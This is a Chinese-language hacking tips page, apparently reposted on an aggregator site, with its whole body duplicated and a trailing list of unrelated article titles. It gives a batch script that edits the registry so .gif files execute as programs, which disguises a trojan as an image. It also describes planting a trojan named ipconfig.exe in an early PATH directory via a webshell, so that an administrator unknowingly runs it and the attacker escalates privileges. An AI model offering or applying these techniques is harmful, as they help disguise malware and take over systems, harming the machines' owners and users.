木马伪装图片运行的技巧
来源:百度文库 编辑:神马文学网 时间:2024/06/05 02:15:25
任意文件当做木马来运行
你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。
更改exe为gif:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
ECHO @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行
当然我们的木马后缀要换成.GIF 的,嘻嘻。
J-Wphc!m
恢复gif默认:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="image/gif">>gif.reg
ECHO @="giffile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
大家可以发挥想象,有很多可以利用的地方。
环境变量的利用。
有时候我们在webshell下查看系统变量的时候总能得到一些惊喜,比如系统默认的是Path这个环境变量的值是:%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;假如系统装过php的话,那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;那么我们就有机可乘了,因为它的顺序在系统默认的路径前面。那么按照优先级,如果我们执行ipconfig的话,它会先去c:\php这个目录去查找是否存在ipconfig.exe这个文件。如果文件存在,那么它就会先执行c:\php这个目录下的ipconfig.exe文件。所以我们就可以上传一个我们的木马,改名为ipconfig.exe,上传到c:\php目录下,那么当管理员在命令行下运行ipconfig的时候,系统就会执行我们在c:\php下的木马文件。这样我们也可以获得系统权限。而且相当隐蔽,一般不容易被发现。这也不为是一种提权的好办法。
你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。
更改exe为gif:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="application/x-msdownload">>gif.reg
ECHO @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行
当然我们的木马后缀要换成.GIF 的,嘻嘻。
J-Wphc!m
恢复gif默认:
@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
ECHO "Content Type"="image/gif">>gif.reg
ECHO @="giffile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成.BAT的文件。
大家可以发挥想象,有很多可以利用的地方。
环境变量的利用。
有时候我们在webshell下查看系统变量的时候总能得到一些惊喜,比如系统默认的是Path这个环境变量的值是:%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;假如系统装过php的话,那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;那么我们就有机可乘了,因为它的顺序在系统默认的路径前面。那么按照优先级,如果我们执行ipconfig的话,它会先去c:\php这个目录去查找是否存在ipconfig.exe这个文件。如果文件存在,那么它就会先执行c:\php这个目录下的ipconfig.exe文件。所以我们就可以上传一个我们的木马,改名为ipconfig.exe,上传到c:\php目录下,那么当管理员在命令行下运行ipconfig的时候,系统就会执行我们在c:\php下的木马文件。这样我们也可以获得系统权限。而且相当隐蔽,一般不容易被发现。这也不为是一种提权的好办法。
木马伪装图片运行的技巧
神奇的动物伪装照(图片)!
5个胸部伪装变大的技巧
预警:连接恶意站点下载运行病毒的木马
木马的常见四大伪装欺骗行为 - 系统攻防 - 360论坛
Windows系统“运行”的技巧
Windows系统“运行”的技巧
神奇的动物伪装照(图片)---园艺
木马的常见四大伪装欺骗行为 - 安全技术讨论 - 爱好者论坛 IT知识与信息普及网站—爱好...
5个胸部变大的伪装技巧是什么?
5个胸部变大的伪装技巧是什么?
5个胸部变大的伪装技巧是什么?
5个胸部变大的伪装技巧是什么?
堵住系统自动运行 销毁病毒木马
堵住系统自动运行 销毁病毒木马
堵住系统自运行,堵住木马
一键判断QQ有无木马的技巧
一键判断QQ有无木马的小技巧
手动清除软件木马后门程序的小技巧
提升Windows XP运行速度的技巧
活学活用Windows系统“运行”的技巧
带刺的伪装
伪装的坚强
十二星座的伪装